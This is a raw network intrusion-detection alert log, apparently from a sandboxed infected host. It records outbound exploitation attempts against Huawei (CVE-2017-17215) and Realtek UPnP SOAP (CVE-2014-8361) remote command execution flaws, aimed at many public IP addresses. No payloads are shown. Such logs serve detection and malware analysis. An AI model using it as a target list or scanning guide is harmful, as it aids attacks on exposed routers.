                                      07/20/24-23:01:40.301143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4634237215192.168.2.23165.249.91.251
                                      07/20/24-23:01:08.572556TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23373852869192.168.2.2375.207.187.133
                                      07/20/24-23:01:42.839255TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23796452869192.168.2.2347.35.34.220
                                      07/20/24-23:01:41.270795TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5837052869192.168.2.23112.83.62.168
                                      07/20/24-23:01:13.628544TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615029252869192.168.2.2390.205.64.234
                                      07/20/24-23:02:05.476791TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615621452869192.168.2.2393.40.207.17
                                      07/20/24-23:01:41.360320TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614779652869192.168.2.2398.9.1.207
                                      07/20/24-23:01:42.285526TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5570252869192.168.2.23174.30.181.131
                                      07/20/24-23:01:31.327540TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5701452869192.168.2.23179.142.123.85
                                      07/20/24-23:02:04.525064TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3860452869192.168.2.23164.237.7.212
                                      07/20/24-23:01:44.450410TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4807852869192.168.2.23198.250.155.116
                                      07/20/24-23:01:27.653028TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3322637215192.168.2.23157.147.20.129
                                      07/20/24-23:01:31.316196TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5949052869192.168.2.2359.21.137.98
                                      07/20/24-23:01:43.005974TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25629052869192.168.2.23208.24.233.14
                                      07/20/24-23:01:08.600114TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3822652869192.168.2.23207.30.132.8
                                      07/20/24-23:01:24.943244TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4763837215192.168.2.23140.101.155.227
                                      07/20/24-23:01:48.855306TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5937652869192.168.2.23152.241.189.22
                                      07/20/24-23:02:02.527007TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4734852869192.168.2.23138.206.228.107
                                      07/20/24-23:01:44.977483TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613888252869192.168.2.23203.196.31.139
                                      07/20/24-23:01:52.826575TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24254652869192.168.2.239.230.247.23
                                      07/20/24-23:01:27.650975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5757837215192.168.2.23197.47.237.221
                                      07/20/24-23:01:48.560945TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614934852869192.168.2.2363.196.31.124
                                      07/20/24-23:01:40.349275TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4091437215192.168.2.23170.167.238.210
                                      07/20/24-23:01:50.951743TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613959452869192.168.2.2379.227.52.7
                                      07/20/24-23:00:57.221735TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4768437215192.168.2.2341.214.148.214
                                      07/20/24-23:01:02.113054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4498437215192.168.2.23197.81.4.61
                                      07/20/24-23:01:08.639622TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25732052869192.168.2.2325.0.169.170
                                      07/20/24-23:01:47.614619TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3721452869192.168.2.23174.213.208.19
                                      07/20/24-23:01:20.149798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6043837215192.168.2.23197.121.187.182
                                      07/20/24-23:01:42.966087TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614289652869192.168.2.23201.73.178.106
                                      07/20/24-23:01:27.668073TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5655037215192.168.2.2398.247.239.87
                                      07/20/24-23:02:04.592319TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615279252869192.168.2.23160.192.28.117
                                      07/20/24-23:01:52.883801TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615511252869192.168.2.23128.145.135.61
                                      07/20/24-23:01:57.560388TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25031452869192.168.2.2367.31.108.66
                                      07/20/24-23:02:03.987678TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614041052869192.168.2.2395.249.40.161
                                      07/20/24-23:01:21.943544TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4092037215192.168.2.2387.221.31.50
                                      07/20/24-23:01:31.974514TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3941037215192.168.2.2341.187.164.155
                                      07/20/24-23:01:41.372363TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613832252869192.168.2.2336.18.145.215
                                      07/20/24-23:02:08.090582TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614583852869192.168.2.2386.178.198.137
                                      07/20/24-23:01:24.944299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3831237215192.168.2.23157.46.123.167
                                      07/20/24-23:01:31.326982TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6050052869192.168.2.2370.211.204.245
                                      07/20/24-23:01:31.981855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4955837215192.168.2.23157.215.201.153
                                      07/20/24-23:01:45.472422TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5186252869192.168.2.239.210.224.238
                                      07/20/24-23:01:13.989215TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3387052869192.168.2.23130.80.10.211
                                      07/20/24-23:00:57.220817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4886037215192.168.2.23157.115.56.95
                                      07/20/24-23:01:00.645051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4682237215192.168.2.23157.249.16.252
                                      07/20/24-23:01:43.282556TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614541852869192.168.2.23173.144.227.253
                                      07/20/24-23:01:51.400635TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5479252869192.168.2.23156.192.144.142
                                      07/20/24-23:01:20.591324TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24390052869192.168.2.2347.250.162.49
                                      07/20/24-23:01:44.954688TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23341652869192.168.2.2332.0.100.142
                                      07/20/24-23:01:53.475886TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614097252869192.168.2.2380.120.36.80
                                      07/20/24-23:01:20.599458TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4461852869192.168.2.23109.120.196.186
                                      07/20/24-23:01:46.562532TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4158452869192.168.2.23198.167.255.95
                                      07/20/24-23:01:31.976984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5332437215192.168.2.23197.124.214.37
                                      07/20/24-23:02:27.457367TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25956252869192.168.2.2339.202.167.253
                                      07/20/24-23:01:41.956473TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23581052869192.168.2.23175.222.36.60
                                      07/20/24-23:01:42.406731TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4644852869192.168.2.2338.105.221.242
                                      07/20/24-23:01:43.243266TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615820052869192.168.2.2396.94.31.193
                                      07/20/24-23:02:07.698636TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4142252869192.168.2.23166.233.183.8
                                      07/20/24-23:01:45.092574TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613455252869192.168.2.2334.147.70.115
                                      07/20/24-23:01:07.018425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4133837215192.168.2.2341.94.23.218
                                      07/20/24-23:01:25.965816TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5682052869192.168.2.2345.144.124.12
                                      07/20/24-23:01:00.633578TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5956237215192.168.2.23197.67.79.4
                                      07/20/24-23:01:40.310207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4954837215192.168.2.23157.85.94.106
                                      07/20/24-23:00:57.221090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5272837215192.168.2.23125.230.182.28
                                      07/20/24-23:01:50.955471TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4623252869192.168.2.23206.46.247.134
                                      07/20/24-23:01:48.413537TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5745452869192.168.2.23102.251.132.142
                                      07/20/24-23:01:20.132103TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3286637215192.168.2.23197.213.39.196
                                      07/20/24-23:01:50.845923TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4181052869192.168.2.2363.243.31.167
                                      07/20/24-23:01:12.807274TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25310052869192.168.2.23166.63.2.220
                                      07/20/24-23:01:52.992845TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4895852869192.168.2.2376.71.172.39
                                      07/20/24-23:01:34.044538TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5842237215192.168.2.23197.183.243.219
                                      07/20/24-23:01:07.033766TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3960037215192.168.2.23197.25.40.12
                                      07/20/24-23:01:43.239928TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4174052869192.168.2.23101.184.157.141
                                      07/20/24-23:02:06.615381TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5064852869192.168.2.2378.1.44.43
                                      07/20/24-23:02:20.374641TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4173652869192.168.2.23198.93.236.85
                                      07/20/24-23:01:20.597058TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25822852869192.168.2.2387.178.133.43
                                      07/20/24-23:01:42.612597TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24545652869192.168.2.23108.79.31.157
                                      07/20/24-23:01:43.751196TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614929852869192.168.2.23183.249.169.230
                                      07/20/24-23:01:04.118165TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3497237215192.168.2.23197.160.175.250
                                      07/20/24-23:01:56.447869TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5548652869192.168.2.2373.161.205.249
                                      07/20/24-23:01:51.360754TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5461052869192.168.2.23173.40.109.207
                                      07/20/24-23:01:34.053062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3530637215192.168.2.2341.171.1.73
                                      07/20/24-23:01:44.318262TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4753852869192.168.2.2338.183.196.72
                                      07/20/24-23:01:43.364263TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614760052869192.168.2.2394.8.52.195
                                      07/20/24-23:01:47.622268TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5680052869192.168.2.2342.61.115.2
                                      07/20/24-23:01:42.813695TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3642452869192.168.2.23196.248.47.177
                                      07/20/24-23:01:46.899168TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3649652869192.168.2.23206.12.145.11
                                      07/20/24-23:01:42.799973TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4159852869192.168.2.2332.163.145.253
                                      07/20/24-23:01:42.499887TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613562252869192.168.2.2399.176.241.96
                                      07/20/24-23:01:02.281138TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615241452869192.168.2.2345.158.122.120
                                      07/20/24-23:01:46.707648TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4787652869192.168.2.2347.97.62.221
                                      07/20/24-23:01:27.651332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5707637215192.168.2.23197.216.140.107
                                      07/20/24-23:01:31.313383TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3428852869192.168.2.2347.20.172.49
                                      07/20/24-23:01:45.407048TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3417052869192.168.2.2334.82.199.243
                                      07/20/24-23:01:53.484243TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614860252869192.168.2.23171.210.140.181
                                      07/20/24-23:01:10.550846TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5284652869192.168.2.23195.196.57.80
                                      07/20/24-23:01:42.014835TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5501052869192.168.2.23117.174.229.249
                                      07/20/24-23:01:42.196522TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3335852869192.168.2.2341.87.239.136
                                      07/20/24-23:01:02.345084TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6078452869192.168.2.23178.251.54.152
                                      07/20/24-23:01:01.333817TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4014452869192.168.2.2347.237.197.200
                                      07/20/24-23:01:43.044692TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3365852869192.168.2.2378.241.170.132
                                      07/20/24-23:01:54.562310TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615773652869192.168.2.23120.165.99.108
                                      07/20/24-23:01:42.800757TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3694652869192.168.2.23222.217.185.57
                                      07/20/24-23:01:07.114267TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3582237215192.168.2.23107.192.16.201
                                      07/20/24-23:01:45.887574TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5300052869192.168.2.2397.241.192.98
                                      07/20/24-23:01:51.354566TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4843452869192.168.2.23187.61.181.140
                                      07/20/24-23:01:24.898476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5957637215192.168.2.23132.85.106.74
                                      07/20/24-23:01:20.156820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5659037215192.168.2.23157.20.155.148
                                      07/20/24-23:01:53.219427TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3493452869192.168.2.2343.175.201.8
                                      07/20/24-23:01:31.312611TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4918852869192.168.2.2348.111.4.84
                                      07/20/24-23:01:44.520226TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5230852869192.168.2.23108.210.234.252
                                      07/20/24-23:01:43.596881TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3547652869192.168.2.23108.48.65.201
                                      07/20/24-23:01:59.707284TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615204452869192.168.2.2366.82.21.101
                                      07/20/24-23:01:44.602822TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23308652869192.168.2.2346.141.217.184
                                      07/20/24-23:01:04.050503TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6085037215192.168.2.23197.232.225.145
                                      07/20/24-23:01:11.639230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5663037215192.168.2.23157.17.142.189
                                      07/20/24-23:01:41.967549TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4962452869192.168.2.23191.235.3.135
                                      07/20/24-23:01:02.104572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4336837215192.168.2.2341.75.108.94
                                      07/20/24-23:01:41.956472TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4180252869192.168.2.235.95.241.47
                                      07/20/24-23:01:44.274940TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24492452869192.168.2.2339.205.206.142
                                      07/20/24-23:01:43.994703TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3367852869192.168.2.2344.152.141.175
                                      07/20/24-23:01:55.716125TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3657652869192.168.2.23172.44.248.130
                                      07/20/24-23:01:25.689098TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5475052869192.168.2.23106.220.99.163
                                      07/20/24-23:01:46.308516TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5433452869192.168.2.2336.130.15.144
                                      07/20/24-23:01:04.094795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5408237215192.168.2.23129.251.133.85
                                      07/20/24-23:01:46.827502TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25508852869192.168.2.23110.40.238.120
                                      07/20/24-23:01:40.321965TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4248437215192.168.2.23157.226.115.171
                                      07/20/24-23:01:24.934977TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4068837215192.168.2.23197.22.127.255
                                      07/20/24-23:01:47.407718TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3549452869192.168.2.23133.122.43.145
                                      07/20/24-23:01:54.345401TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4470452869192.168.2.2367.25.105.249
                                      07/20/24-23:01:48.596773TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613787252869192.168.2.23133.40.152.48
                                      07/20/24-23:02:08.719613TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4513852869192.168.2.2381.228.162.123
                                      07/20/24-23:01:27.653586TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5653637215192.168.2.23157.178.65.214
                                      07/20/24-23:01:31.312895TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5084452869192.168.2.2332.85.156.168
                                      07/20/24-23:01:42.536855TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6022652869192.168.2.2353.20.116.108
                                      07/20/24-23:01:44.252201TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613488652869192.168.2.2366.96.161.223
                                      07/20/24-23:01:44.914703TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4269852869192.168.2.23183.141.159.182
                                      07/20/24-23:01:52.684130TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613660652869192.168.2.2375.139.110.226
                                      07/20/24-23:01:04.100971TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6025037215192.168.2.23157.85.128.112
                                      07/20/24-23:01:42.728248TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3764052869192.168.2.2385.109.146.148
                                      07/20/24-23:01:07.004906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3476837215192.168.2.2341.233.112.193
                                      07/20/24-23:01:40.321964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4623237215192.168.2.23197.27.250.238
                                      07/20/24-23:01:45.591520TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5300652869192.168.2.23200.248.84.13
                                      07/20/24-23:02:01.320867TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3855452869192.168.2.2348.17.76.254
                                      07/20/24-23:01:27.735617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5915237215192.168.2.2341.36.252.9
                                      07/20/24-23:02:00.322736TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615520452869192.168.2.23106.193.250.91
                                      07/20/24-23:01:01.426918TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613614252869192.168.2.23160.189.204.148
                                      07/20/24-23:01:43.970621TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25101052869192.168.2.23173.1.18.208
                                      07/20/24-23:01:02.123155TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614674652869192.168.2.23113.241.155.67
                                      07/20/24-23:01:12.834603TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25094852869192.168.2.2350.114.115.150
                                      07/20/24-23:01:04.053605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3892437215192.168.2.2341.212.31.237
                                      07/20/24-23:01:08.584506TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25790252869192.168.2.23143.198.233.204
                                      07/20/24-23:01:11.631728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4046637215192.168.2.2341.122.186.57
                                      07/20/24-23:01:02.048214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4817037215192.168.2.2343.99.159.58
                                      07/20/24-23:01:43.621955TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24878452869192.168.2.2364.190.167.168
                                      07/20/24-23:01:24.904906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4644837215192.168.2.23197.5.78.7
                                      07/20/24-23:01:41.412156TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3699052869192.168.2.23143.66.245.70
                                      07/20/24-23:01:43.088724TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5519852869192.168.2.2386.130.161.177
                                      07/20/24-23:01:00.637175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5933437215192.168.2.2397.43.136.85
                                      07/20/24-23:01:42.470759TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4451652869192.168.2.23192.12.11.101
                                      07/20/24-23:01:42.760231TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5262052869192.168.2.23138.36.169.221
                                      07/20/24-23:01:46.530676TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24842252869192.168.2.2345.122.145.145
                                      07/20/24-23:01:52.482723TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614154052869192.168.2.23116.106.3.51
                                      07/20/24-23:01:00.645051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4716437215192.168.2.23157.63.143.206
                                      07/20/24-23:01:20.181938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3338837215192.168.2.23197.10.70.203
                                      07/20/24-23:01:43.489480TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5314652869192.168.2.23171.210.7.241
                                      07/20/24-23:01:24.885849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5532037215192.168.2.23197.227.84.26
                                      07/20/24-23:01:44.144821TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4036252869192.168.2.2312.65.191.23
                                      07/20/24-23:02:02.632381TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614931052869192.168.2.23112.44.8.51
                                      07/20/24-23:01:31.981855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3919837215192.168.2.2341.107.194.160
                                      07/20/24-23:01:54.957644TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25966652869192.168.2.2341.28.215.223
                                      07/20/24-23:01:53.503242TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5497852869192.168.2.2313.253.184.187
                                      07/20/24-23:01:11.634372TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5048637215192.168.2.2341.28.156.220
                                      07/20/24-23:01:03.072080TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5666452869192.168.2.23107.75.193.125
                                      07/20/24-23:01:43.185498TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23743652869192.168.2.2357.234.190.125
                                      07/20/24-23:01:41.275004TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5577252869192.168.2.23112.189.246.31
